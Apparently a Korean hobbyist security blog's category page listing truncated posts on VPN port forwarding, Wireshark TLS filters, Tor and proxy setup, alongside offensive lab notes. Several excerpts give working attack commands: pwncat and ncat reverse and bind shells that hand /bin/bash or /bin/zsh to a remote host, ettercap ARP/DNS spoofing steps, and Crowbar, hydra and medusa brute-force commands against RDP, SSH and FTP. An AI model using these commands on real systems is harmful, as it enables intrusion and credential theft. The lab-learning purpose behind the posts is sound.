๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
  • Tried. Failed. Logged.
728x90

๐Ÿ”’์ •๋ณด๋ณด์•ˆ/๋„คํŠธ์›Œํฌ ๋ณด์•ˆ25

๋„คํŠธ์›Œํฌ ๋ณด์•ˆ - Mullvad VPN ํฌํŠธํฌ์›Œ๋”ฉ์œผ๋กœ ์›น ์„œ๋ฒ„ ์™ธ๋ถ€์—์„œ ์ ‘์† Mullvad VPN ์‚ฌ์ดํŠธ: ๊ณ„์ • > ์žฅ์น˜ ํƒญ์—์„œ ๋‚ด ์žฅ์น˜ ํ™•์ธ ์ฃผ์†Œ: https://mullvad.net/ko/account/#/devices ๋‚ด ์žฅ์น˜์—์„œ "ํฌํŠธ ์ถ”๊ฐ€" ํด๋ฆญ ํฌํŠธํฌ์›Œ๋”ฉ ์„ค์ • ๋ฐฐ์ •๋œ ํฌํŠธ ๋ฒˆํ˜ธ ํ™•์ธ ๋‚˜๋ผ-๋„์‹œ-ํฌํŠธ๋ฒˆํ˜ธ ํ˜•์‹์ด๋ฉฐ ๋’ค์— ์ˆซ์ž ๋ฒˆํ˜ธ๊ฐ€ ์ง€์ •๋ฐ›์€ ๋‚ด ํฌํŠธ ๋ฒˆํ˜ธ์ด๋‹ค. Mullvad VPN ํ”„๋กœ๊ทธ๋žจ์—์„œ ํ†ฑ๋‹ˆ๋ฐ”ํ€ด(์„ค์ •) ํด๋ฆญ "VPN ์„ค์ •" ํด๋ฆญ ํ„ฐ๋„ ํ”„๋กœํ† ์ฝœ ํ•ญ๋ชฉ์—์„œ "OpenVPN"์„ ์„ ํƒ ๋ฐ˜๋“œ์‹œ VPN ์„œ๋ฒ„์˜ ์—ฐ๊ฒฐ๋œ ์œ„์น˜๊ฐ€ ํฌํŠธํฌ์›Œ๋”ฉ ํŽ˜์ด์ง€์—์„œ ์„ค์ •ํ•œ ์œ„์น˜๋ž‘ ์ผ์น˜ํ•˜๋Š”์ง€ ํ™•์ธ Mullvad VPN ์‚ฌ์ดํŠธ์—์„œ ํฌํŠธ ์ ‘์† ํ™•์ธํ•˜๊ธฐ ์ฃผ์†Œ: https://mullvad.net/ko/check ์ž์‹ ์˜ IPv4 ์ฃผ์†Œ๋ฅผ ์šฐ์„  ํ™•์ธ ๋ฐ”๋กœ ํ•˜๋‹จ์— "ํฌํŠธ ํ™•์ธ" ํƒญ์œผ๋กœ ๋“ค์–ด๊ฐ€ ๋ฐฉ๊ธˆ ์ „์— ํ™•์ธํ•œ ํฌ.. 2023. 3. 19.
๋„คํŠธ์›Œํฌ ํ•ดํ‚น - pwncat ๋ฆฌ๋ฒ„์Šค์‰˜ ๋ช…๋ น์–ด pip ์„ค์น˜ ๋ช…๋ น์–ด pip install pwncat victim(ํด๋ผ์ด์–ธํŠธ)์ด ๊ณต๊ฒฉ์ž(์„œ๋ฒ„) ์ ‘์†์„ ์œ„ํ•œ ์„ค์น˜ ๋ช…๋ น์–ด sudo pip install pwncat-cs ์œ„๋Š” ๊ณต๊ฒฉ์ž๊ฐ€ python3 -m pwncat ๋ช…๋ น์–ด๋ฅผ ์“ฐ๊ธฐ ์œ„ํ•œ ์„ค์น˜ ๋ช…๋ น์–ด TCP Reverse shell(ํด๋ผ์ด์–ธํŠธ) pwncat -e '/bin/bash' example.com 4444 pwncat -e '/bin/bash' example.com 4444 --reconn --reconn-wait 10 10์ดˆ๋งˆ๋‹ค ์žฌ์—ฐ๊ฒฐ ์‹œ๋„ ๊ณต๊ฒฉ์ž ๋ฆฌ๋ฒ„์Šค์‰˜ ์„œ๋ฒ„ ์˜คํ”ˆ python3 -m pwncat -lp 4444 pwncat ํ”„๋กฌํ”„ํŠธ ๋ช…๋ น์–ด / ๋‹จ์ถ•ํ‚ค sessions: ์—ฐ๊ฒฐ๋œ victim๋“ค ํ™•์ธ sessions {ID}: ์ƒํ˜ธ์ž‘์šฉ ํ•˜๋ ค๋Š” victi.. 2023. 3. 16.
๋„คํŠธ์›Œํฌ ๋ณด์•ˆ - ์•„์ดํ”ผ๋กœ ์•…์˜์ ์ธ ํ”ผํ•ด ์‚ฌ๋ก€ ๊ฒ€์ƒ‰(criminalip.io) https://www.criminalip.io/ko Cybersecurity Search Engine | Criminal IP Criminal IP is a Cyber Threat Intelligence Search Engine and Attack Surface Management(ASM) platform to find everything in Cybersecurity with impressive amount data capacities, API speed, and price. www.criminalip.io 2023. 3. 12.
๋„คํŠธ์›Œํฌ ๋ณด์•ˆ - ์™€์ด์–ด์ƒคํฌ(Wireshark) SSL handshake ํ•„ํ„ฐ Useful Wireshark filter for analysis of SSL Traffic. Client Hello: ssl.handshake.type == 1 Server Hello: ssl.handshake.type == 2 NewSessionTicket: ssl.handshake.type == 4 Certificate: ssl.handshake.type == 11 CertificateRequest ssl.handshake.type == 13 ServerHelloDone: ssl.handshake.type == 14 Note: “ServerHellpDone” means full-handshake TLS session. Cipher Suites: ssl.handshake.ciphersuite I fo.. 2022. 9. 22.
๋„คํŠธ์›Œํฌ ๋ณด์•ˆ - VPN๋ณด๋‹ค ๊ฐ•๋ ฅํ•œ ์ฐจ์„ธ๋Œ€ ๋ณด์•ˆ์†”๋ฃจ์…˜(SPN) VPN ๋ฐฉ์‹ VPN ํด๋ผ์ด์–ธํŠธ๊ฐ€ ์•”ํ˜ธํ™”ํ•œ ๋ฐ์ดํ„ฐ๋ฅผ VPN ์„œ๋ฒ„์—๊ฒŒ ์ „๋‹ฌํ•˜๋ฉด ISP๊ฐ€ ๋ฐ์ดํ„ฐ๋ฅผ ์•Œ์•„๋ณผ ์ˆ˜๊ฐ€ ์—†๋‹ค. ํ•˜์ง€๋งŒ VPN ์„œ๋ฒ„์—๋Š” ์•”ํ˜ธํ™”๋ฅผ ๋ณตํ˜ธํ™”ํ•  ์ˆ˜ ์žˆ๋Š” ํ‚ค๊ฐ€ ์กด์žฌํ•˜๊ธฐ ๋•Œ๋ฌธ์— ์–ธ์ œ๋“  ์‚ฌ์šฉ์ž์˜ ๊ฐœ์ธ์ •๋ณดํ˜ธ๋ฅผ ๋กœ๊น…ํ•˜๋Š”๊ฒŒ ๊ฐ€๋Šฅํ•˜๋ฏ€๋กœ 100% ์‹ ๋ขฐํ•˜๊ธฐ ์–ด๋ ต๋‹ค. SPN(Safing Privacy Network) ๋ฐฉ์‹ ๋งˆ์น˜ Tor ๋„คํŠธ์›Œํฌ์ฒ˜๋Ÿผ ๋…ธ๋“œ๋ฅผ ์—ฌ๋Ÿฌ ๊ฐœ๋ฅผ ๊ฑฐ์ณ์„œ(๋ฉ€ํ‹ฐํ™‰) ์„œ๋ฒ„์— ๋ฐ์ดํ„ฐ๋ฅผ ์š”์ฒญํ•˜๋Š” ๋ฐฉ์‹ ๋‹น์—ฐํžˆ ๋…ธ๋“œ๋“ค๊ณผ ์—ฐ๊ฒฐ ๊ด€๊ณ„๋ฅผ ํ˜•์„ฑํ•˜๋ฉด ๋…ธ๋“œ๋“ค์€ ์ฃผ๋ณ€์— ๋‹ค๋ฅธ ๋…ธ๋“œ๋“ค(์ˆ˜์‹ , ์†ก์‹ )์˜ ์ •๋ณด๋งŒ ๊ฐ€์ง€๊ณ  ์žˆ์ง€ ์†Œ์Šค์™€ ๋ฐ์Šคํ‹ฐ๋„ค์ด์…˜์˜ ์ •๋ณด์™€ ๋ฐ์ดํ„ฐ ์ •๋ณด๋Š” ์•”ํ˜ธํ™”๊ฐ€ ๋˜์–ด ํ™•์ธํ•  ์ˆ˜ ์—†๋‹ค. Portmaster์˜ SPN ์‹œ์—ฐ ์˜์ƒ https://youtu.be/p3tjNmFKrDk ์ถœ์ฒ˜: https://safing.io.. 2022. 8. 28.
๋„คํŠธ์›Œํฌ ํ•ดํ‚น - ๋งฅ(MacOS) ๋ฆฌ๋ฒ„์Šค ์‰˜(Reverse Shell), ๋ฐ”์ธ๋“œ ์‰˜(Bind Shell) ์—ฐ๊ฒฐ ์‹ค์Šต ํ™˜๊ฒฝ ๊ณต๊ฒฉ์ž ํ™˜๊ฒฝ: Ubuntu IP: 192.168.0.5 ๊ณต๊ฒฉ ๋Œ€์ƒ MacOS(10.13.6) IP: 192.168.0.6 * ๋งฅ์—์„œ๋Š” nc ๋ช…๋ น์–ด๊ฐ€ ๋˜์ง€ ์•Š๋Š” ๋ฌธ์ œ๋กœ ๋Œ€์‹  ncat ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•˜์˜€๋‹ค. ๋ฆฌ๋ฒ„์Šค ์‰˜ ๊ณต๊ฒฉ์ž๊ฐ€ ์ง์ ‘ ์„œ๋ฒ„๋ฅผ ์—ฌ๋Š” ๋ฐฉ์‹์œผ๋กœ ๊ณต๊ฒฉ ๋Œ€์ƒ์ž์˜ ๋ง‰ํ˜€์žˆ๋Š” ๋ฐฉํ™”๋ฒฝ(์•„์›ƒ๋ฐ”์ธ๋“œ)์„ ์šฐํšŒํ•  ์ˆ˜ ์žˆ๋‹ค. ๊ณต๊ฒฉ์ž(Ubuntu) nc -lvp 4444 ๊ณต๊ฒฉ ๋Œ€์ƒ(MacOS) ncat 192.168.0.5 4444 -e /bin/zsh ๋ฐ”์ธ๋“œ ์‰˜ ๊ณต๊ฒฉ ๋Œ€์ƒ์ž๊ฐ€ ์ง์ ‘ ์„œ๋ฒ„๋ฅผ ์—ฌ๋Š” ํ˜•ํƒœ์ด๋‹ค. ๊ณต๊ฒฉ ๋Œ€์ƒ(MacOS) ncat -lvp 4444 -e /bin/zsh ๊ณต๊ฒฉ์ž(Ubuntu) nc 192.168.0.6 4444 ์ถœ์ฒ˜: https://hobbylists.tistory.com/entry/kal.. 2022. 8. 5.
๋„คํŠธ์›Œํฌ ํ•ดํ‚น - tor ์ž‘๋™ ์›๋ฆฌ ๋‹ค์Œ์€ Tor ํด๋ผ์ด์–ธํŠธ A (์›๋ณธ)์—์„œ Tor ์„œ๋ฒ„ B, C๋ฅผ ์ฐจ๋ก€๋กœ ๊ฑฐ์ณ ๋ชฉ์ ์ง€ D (์ผ๋ฐ˜ Web ์„œ๋ฒ„ ๋“ฑ)์— ์ด๋ฅด๋Š” ๊ฒฝ์šฐ์˜ ์„ค๋ช…์ด๋‹ค. 1. A๋Š” ๋ฏธ๋ฆฌ ์–ป๊ณ  ์žˆ๋Š” ๋””๋ ‰ํ† ๋ฆฌ ๋ชฉ๋ก์—์„œ ์ž„์˜๋กœ B์™€ C๋ฅผ ์„ ํƒํ•œ๋‹ค. 2. A๋Š” B์— ๋Œ€ํ•ด ๊ฐ€์ƒ ํšŒ์„  ์—ฐ๊ฒฐ ์š”์ฒญ, AB ์‚ฌ์ด์˜ ์•”ํ˜ธํ™” ํ†ต์‹ ์„ ์œ„ํ•œ ์„ธ์…˜ ํ‚ค๋ฅผ ๊ตํ™˜ํ•˜๊ธฐ ์œ„ํ•œ ์ •๋ณด์™€ ํ•จ๊ป˜ ์ „๋‹ฌํ•œ๋‹ค. 3. B๋Š” A์— ๊ฐ€์ƒ ํšŒ์„  ์—ฐ๊ฒฐ ์ˆ˜๋ฝ๊ณผ ํ•จ๊ป˜ ์„ธ์…˜ ํ‚ค ๊ตํ™˜์„ ์œ„ํ•œ ์ •๋ณด๋ฅผ ์ „์†กํ•œ๋‹ค. 4. AB ์‚ฌ์ด์— ์ „๋‹จ๊นŒ์ง€ ์–ป์€ ์„ธ์…˜ ํ‚ค๋Š” ์•”ํ˜ธํ™” ํ†ต์‹ ๋กœ ์–ป์„ ์ˆ˜ ์žˆ๋‹ค. ์ดํ›„ AB ๊ฐ„์˜ ํ†ต์‹ ์ด ์•”ํ˜ธํ™” ํ†ต์‹  ๊ฒฝ๋กœ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํ–‰ํ•ด์ง„๋‹ค. 5. A๋Š” B์— ๋Œ€ํ•ด "B๊ฐ€ C์— ๋Œ€ํ•œ ๊ฐ€์ƒ ํšŒ์„  ์—ฐ๊ฒฐ์˜ ์š”๊ตฌ๋ฅผ ์ œ์ถœํ•˜๋Š” ๊ฒƒ"์„ ์š”๊ตฌํ•˜๋Š” ์ „์†กํ•œ๋‹ค. 6. B๋Š” C์— ๋Œ€ํ•ด ๊ฐ€์ƒ ํšŒ์„  ์—ฐ๊ฒฐ ์š”์ฒญ, BC ์‚ฌ์ด.. 2022. 8. 1.
๋ฆฌ๋ˆ…์Šค - ssh ์—ฐ๊ฒฐ์‹œ tor socks5 ๊ฒฝ์œ ํ•˜๊ธฐ ํ•„์š” ํŒจํ‚ค์ง€ ์„ค์น˜ apt install tor apt install connect # nc(netcat)์ด ์„ค์น˜๋˜์–ด ์žˆ๋‹ค๋ฉด ๋ฌด์‹œ ์„ค์น˜ ํ›„์—๋Š” tor๋ฅผ ์‹คํ–‰์‹œ์ผœ์ค€๋‹ค. ์‚ฌ์šฉ ๋ช…๋ น์–ด connect ProxyCommand ์‚ฌ์šฉ ๋ฐฉ๋ฒ• ssh -o "ProxyCommand connect -5 -S localhost:9050 %h %p" user@123.123.123.123 nc ProxyCommand ์‚ฌ์šฉ ๋ฐฉ๋ฒ• ssh -o ProxyCommand="nc -x localhost:9050 %h %p" user@123.123.123.123 ํ”„๋ก์‹œ ์„ฑ๊ณต ํ™•์ธ ๋ช…๋ น์–ด Windows netstat -n | findstr 22 Linux/macOS who am i ์œ„์˜ ๋ช…๋ น์–ด ์‹คํ–‰์‹œ์— ๋‚ด ์ ‘์† ์•„์ดํ”ผ๊ฐ€ tor IP ์ฃผ์†Œ๋กœ ๋œฌ๋‹ค.. 2022. 8. 1.
๋„คํŠธ์›Œํฌ ํ•ดํ‚น - ettercap์˜ arp ์Šคํ‘ธํ•‘์„ ์ด์šฉํ•ด dns ์Šคํ‘ธํ•‘ํ•˜๊ธฐ ์šฐ์„  ettercap ์ผ ๋‹ค. ๊ทธ๋ฆฌ๊ณ  eth0์— ์ ‘๊ทผ ์ธํ„ฐํŽ˜์ด์Šค ์ƒ๋‹จ์— ๋ณด๋ฉด ๋‹๋ณด๊ธฐ ๋ชจ์–‘์ด ์žˆ๋Š”๋ฐ ์ด๋ฅผ ํด๋ฆญํ•ด ์ฃผ๋ณ€์— ์กด์žฌํ•˜๋Š” ํ˜ธ์ŠคํŠธ๋“ค์„ ์žก๋Š”๋‹ค. ๊ทธ๋ฆฌ๊ณ  ํ™•์ธ๋œ ์•„์ดํ”ผ ์–ด๋“œ๋ ˆ์Šค๋“ค ์ค‘ ๋ผ์šฐํ„ฐ(๊ณต์œ ๊ธฐ)๋กœ ์ถ”์ •๋˜๋Š” ๊ฒƒ์€ Target 1์œผ๋กœ ์ง€์ •ํ•˜๊ณ , ์Šค๋‹ˆํ•‘(๋„์ฒญ)์„ ๋‹นํ•˜๊ณ ์žํ•˜๋Š” ํƒ€๊ฒŸ์€ Target 2๋กœ ์ง€์ • ์ด์ œ ๋‹ค์‹œ ์ธํ„ฐํŽ˜์ด์Šค์— ์ƒ๋‹จ ๋งจ ์˜ค๋ฅธ์ชฝ์— ์ง€๊ตฌ๋ณธ ๋ชจ์–‘์ด ์žˆ๋Š”๋ฐ ์ด๋ฅผ ํด๋ฆญํ•ด์„œ ARP poising...์„ ๋ˆ„๋ฅธ ๋‹ค์Œ ์ด๋Ÿฐ ์ฒดํฌ ๋ฐ•์Šค ์ฐฝ์ด ๋œจ๊ฒŒ๋˜๋ฉด ์‚ฌ์ง„๊ณผ ๊ฐ™์ด "Sniff remote connections."๋ฅผ ์ฒดํฌํ•˜๊ณ  OK๋ฅผ ๋ˆŒ๋Ÿฌ ARP ์Šคํ‘ธํ•‘์„ ์‹œ์ž‘ํ•œ๋‹ค. ์ด์ œ ํ”ผํ•ด์ž์˜ PC๋ฅผ ์กฐ์ž‘ํ•œ๋‹ค. cmd์— ๋“ค์–ด๊ฐ€์„œ "arp -a"๋ฅผ ์‹คํ–‰์‹œ์ผœ์ฃผ๊ฒŒ ๋˜๋ฉด (ARP ํ…Œ์ด๋ธ” ํ™•์ธ ๋ช…๋ น์–ด) ๊ณต์œ ๊ธฐ์˜ ๋ฌผ๋ฆฌ์  ์ฃผ์†Œ๊ฐ€ ์•„๋ž˜์˜ ๋‹ค๋ฅธ.. 2021. 12. 22.
๋„คํŠธ์›Œํฌ ํ•ดํ‚น - Tor ProxyChains ๋กœ์ปฌ ํ”„๋ก์‹œ ์„ค์ • https://medium.com/cyberxerx/how-to-setup-proxychains-in-kali-linux-by-terminal-618e2039b663 How to Setup PROXYCHAINS in Kali-Linux by Terminal proxychains is open source software for Linux systems and comes pre-installed with Kali Linux, the tool redirects TCP connections through… medium.com [์„ค์น˜ ๋ฐ ์„ค์ •] # tor ์„ค์น˜ sudo apt install tor # proxychains ์„ค์ • ํŒŒ์ผ ์ˆ˜์ •ํ•˜๊ธฐ sudo vim /etc/proxychains.conf or sudo .. 2021. 12. 15.
๋„คํŠธ์›Œํฌ ํ•ดํ‚น - rdp ์‚ฌ์ „ ๊ณต๊ฒฉ ์žฌํƒ๊ทผ๋ฌด๊ฐ€ ์žฆ์•„์ง„ ์š”์ฆ˜ RDP(Remote Desktop Protocol)๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ์œ ์ €๋“ค์ด ๊ฝค๋‚˜ ๋งŽ์•„์กŒ๋‹ค. ์ด๋Ÿฐ ์‹œ๋Œ€์˜ ํ๋ฆ„์„ ๋งž์ถฐ์„œ RDP๋ฅผ ๊ณต๊ฒฉํ•˜๋Š” ๋‹ค์–‘ํ•œ ๊ณต๊ฒฉ ๋„๊ตฌ๋“ค์ด ์ƒ๊ฒจ๋‚ฌ๋Š”๋ฐ, ๊ทธ์ค‘ ํ•˜๋‚˜๊ฐ€ ์‚ฌ์ „ ๊ณต๊ฒฉ์„ ๋„์™€์ฃผ๋Š” Crowbar๊ฐ€ ์žˆ๋‹ค. ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•˜๊ธฐ ์ด์ „์— ๋ฆฌ๋ˆ…์Šค์— freerdp๊ฐ€ ์„ค์น˜๋˜์–ด์žˆ์–ด์•ผ ํ•จ sudo apt-get install -y nmap openvpn freerdp-x11 vncviewer [์‚ฌ์šฉ ๋ช…๋ น์–ด] ./crowbar.py -b rdp -s 192.168.2.182/32 -u admin -c Aa123456 ./crowbar.py -b rdp -s 192.168.2.250/32 -u localuser -C ~/Desktop/passlist hydra๋กœ๋„ ๊ฐ€๋Šฅํ•˜๋‹ค. [์‚ฌ์šฉ ๋ช….. 2021. 12. 14.
๋„คํŠธ์›Œํฌ ํ•ดํ‚น - medua, ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ ๋„๊ตฌ https://www.kali.org/tools/medusa/ medusa | Kali Linux Tools www.kali.org ์–˜๋„ hydra๊ณผ ๊ฐ™์€ ๋Œ€์ž… ๊ณต๊ฒฉ ๋„๊ตฌ์ด๋‹ค. ์‚ฌ์šฉ ๋ฐฉ๋ฒ•) medusa -h ํ˜ธ์ŠคํŠธ -u ์œ ์ € -P ์‚ฌ์ „(passwords.txt) -M ๋ชจ๋“œ(ssh|ftp) ssh ์„œ๋ฒ„๋ฅผ ๋Œ€์ƒ์œผ๋กœ ์จ๋ดค๋Š”๋ฐ ์ž˜ ๋œ๋‹ค. example) medusa -h 192.168.0.5 -u root -p qwer1234 -M ssh medusa -h 192.168.0.5 -u root -P passwords.txt -M ftp 2021. 11. 22.
728x90